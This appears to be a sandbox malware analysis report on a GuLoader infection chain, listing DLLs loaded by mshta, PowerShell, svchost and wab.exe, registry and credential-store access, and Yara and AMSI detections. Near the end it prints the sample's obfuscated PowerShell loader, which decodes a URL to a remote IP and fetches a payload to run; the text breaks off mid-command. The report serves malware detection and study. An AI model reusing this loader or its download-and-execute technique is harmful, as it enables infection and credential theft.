Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: Google Drive.lnk.7.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.7.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.7.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.7.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.7.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.7.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000005.00000002.2590121491.000000000831A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2587009002.0000000007134000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbw source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: notepad.pdbGCTL source: mshta.exe, 00000000.00000003.1998389233.0000000008651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1995220103.00000000085CD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.2587009002.0000000007146000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbeKug source: powershell.exe, 00000005.00000002.2587009002.00000000071A8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2576907258.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2576907258.0000000002DC3000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000005.00000002.2590524362.0000000008E66000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2590409597.0000000008570000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2584352581.0000000005919000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2795865098.00000000059E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Syvaarsdrenge)$global:Saamaskines = [System.Text.Encoding]::ASCII.GetString($Decompressive)$global:Economization=$Saamaskines.substring(324810,27925)<#Arvings lactoside Delagtiggres
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Gnags $Prevailingly $Turboladningernes), (Begrdes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Sveskerne = [AppDomain]::CurrentDomain.GetAssemblies()$gl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Navigationsskolen)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Weaned, $false).DefineType($Broadside,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Syvaarsdrenge)$global:Saamaskines = [System.Text.Encoding]::ASCII.GetString($Decompressive)$global:Economization=$Saamaskines.substring(324810,27925)<#Arvings lactoside Delagtiggres
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kostplanen = 1;$Farvervej='Substrin';$Farvervej+='g';Function Bortledede($Heksekedlen220){$Electrostatic=$Heksekedlen220.Length-$Kostplanen;For($Lsehovederne=4; $Lsehovederne -lt $Electrostatic; $Lsehovederne+=(5)){$Teaseled+=$Heksekedlen220.$Farvervej.Invoke($Lsehovederne, $Kostplanen);}$Teaseled;}function Oraklerne($Forpagtnigsafgiftens110){. ($Attackman) ($Forpagtnigsafgiftens110);}$Rheophore=Bortledede 'BullM EftoTur,zSikkiQ.aflB ssl Prea Rew/Udlb5Tetr.Bill0Over quic( Ro,WIodiiF rgn G.sdLando AfgwCykes.agt BracN Fl,TBrok Pic,1Jetm0Lagr.Megi0Sho.; App AntiWLaiciSygenHymn6F,rr4 Unf;.rov alvaxAzox6Wapa4 Del;Paca Pro.r HydvOutl:U.de1Pea.2 Sca1.ntr.E.mo0slap)N.nc WindG AbleCompc UntkHor,o ,ei/slre2.rol0 Fir1 U,a0Pann0Bag.1Sten0fort1 arm Re,F katiA acrUnreeprp fCo,soNaphx Cl / An,1Bero2Inds1trlb.Mu k0An.i ';$prologfortolkere=Bortledede 'OphrU jrsMaage GonrSk b-MassAPentgUn,se RetnHa rt,nar ';$Renprisen=Bortledede 'ArthhKurdtCy,itRamppGabe:Hedt/ .ig/ anv8Flyt7 Hom.Extr1 ype2Pree1Fris.Bol 1Lovp0Post5Cott.Samm1P,th6 Ma 3 Dis/ dnSBefouFlinbTeoduA hemSandb,eapiSheelForgi,ishcPyntaNar lPar . MardSkufw Lemp Pos ';$Burgessdom=Bortledede 'W,ip>Til ';$Attackman=Bortledede 'Reisi,once,agaxR.gi 